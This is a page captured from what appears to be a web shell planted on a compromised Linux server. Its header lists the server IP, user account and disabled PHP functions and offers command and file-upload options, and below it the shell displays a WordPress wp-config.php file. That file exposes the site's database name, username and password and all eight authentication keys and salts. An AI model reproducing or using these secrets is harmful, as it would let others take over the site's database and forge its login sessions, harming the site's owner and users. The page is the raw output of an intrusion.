Server IP : 162.240.221.145  /  Your IP : 216.73.216.26
Web Server : Apache
System : Linux server.getmad.today 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : getmadto ( 1003)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/getmadto/public_html/cgi-bin/../ORIGINALPUBLICH/lomad-test4/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/getmadto/public_html/cgi-bin/../ORIGINALPUBLICH/lomad-test4/wp-config.php
<?php

/**

 * The base configuration for WordPress

 *

 * The wp-config.php creation script uses this file during the installation.

 * You don't have to use the web site, you can copy this file to "wp-config.php"

 * and fill in the values.

 *

 * This file contains the following configurations:

 *

 * * Database settings

 * * Secret keys

 * * Database table prefix

 * * ABSPATH

 *

 * @link https://wordpress.org/support/article/editing-wp-config-php/

 *

 * @package WordPress

 */


// ** Database settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define('DB_NAME', 'getmadto_WP6JA');

/** Database username */

define('DB_USER', 'getmadto_WP6JA');

/** Database password */

define('DB_PASSWORD', 'Jc!%HupYXUIMjw[d(');

/** Database hostname */

define('DB_HOST', 'localhost');

/** Database charset to use in creating database tables. */

define( 'DB_CHARSET', 'utf8' );


/** The database collate type. Don't change this if in doubt. */

define( 'DB_COLLATE', '' );


/**#@+

 * Authentication unique keys and salts.

 *

 * Change these to different unique phrases! You can generate these using

 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.

 *

 * You can change these at any point in time to invalidate all existing cookies.

 * This will force all users to have to log in again.

 *

 * @since 2.6.0

 */

define('AUTH_KEY', '3d09144f71109868df44a7a8434de06927c8e55b462775042ffb5763935a7709');
define('SECURE_AUTH_KEY', '7fc80f1f0d3e8ebf86804e587be6c036f0257f60f3c6101353a284ec03979421');
define('LOGGED_IN_KEY', '269102c7aec92db85652576ee311aa9006434bc8caae8644a08794c48db159fc');
define('NONCE_KEY', 'bb9c858b291b13e17ae80050306eff1f65cb876ada665d1c6c72f049c3e4f4ec');
define('AUTH_SALT', 'fe0e6745de0802f03e99a655827d648db58c61e231871b522ae8a16112e4e61d');
define('SECURE_AUTH_SALT', 'fa463ed82404d6e4651efe05bea7d14a5ab436e10ed2615b25a97b2c2f3e7c90');
define('LOGGED_IN_SALT', '955b507b5e13cb3a4b3c66f3b41fef437d82120eff2f9ebf2982eeb1b6a7f13b');
define('NONCE_SALT', '977e044bea500b6a4fbfab7c5232d4fb5a020ee689c84940ce773a7e745406b2');

/**#@-*/


/**

 * WordPress database table prefix.

 *

 * You can have multiple installations in one database if you give each

 * a unique prefix. Only numbers, letters, and underscores please!

 */

define( 'WP_SITEURL', 'https://lomad-test.getmad.today' );
define( 'WP_HOME', 'https://lomad-test.getmad.today' );
$table_prefix = 'cuB_';
define('WP_CRON_LOCK_TIMEOUT', 120);
define('AUTOSAVE_INTERVAL', 300);
define('WP_POST_REVISIONS', 5);
define('EMPTY_TRASH_DAYS', 7);
define('WP_AUTO_UPDATE_CORE', true);

/**

 * For developers: WordPress debugging mode.

 *

 * Change this to true to enable the display of notices during development.

 * It is strongly recommended that plugin and theme developers use WP_DEBUG

 * in their development environments.

 *

 * For information on other constants that can be used for debugging,

 * visit the documentation.

 *

 * @link https://wordpress.org/support/article/debugging-in-wordpress/

 */

define( 'WP_DEBUG', false );


/* Add any custom values between this line and the "stop editing" line. */




/* That's all, stop editing! Happy publishing. */


/** Absolute path to the WordPress directory. */

if ( ! defined( 'ABSPATH' ) ) {

	define( 'ABSPATH', __DIR__ . '/' );

}


/** Sets up WordPress vars and included files. */

require_once ABSPATH . 'wp-settings.php';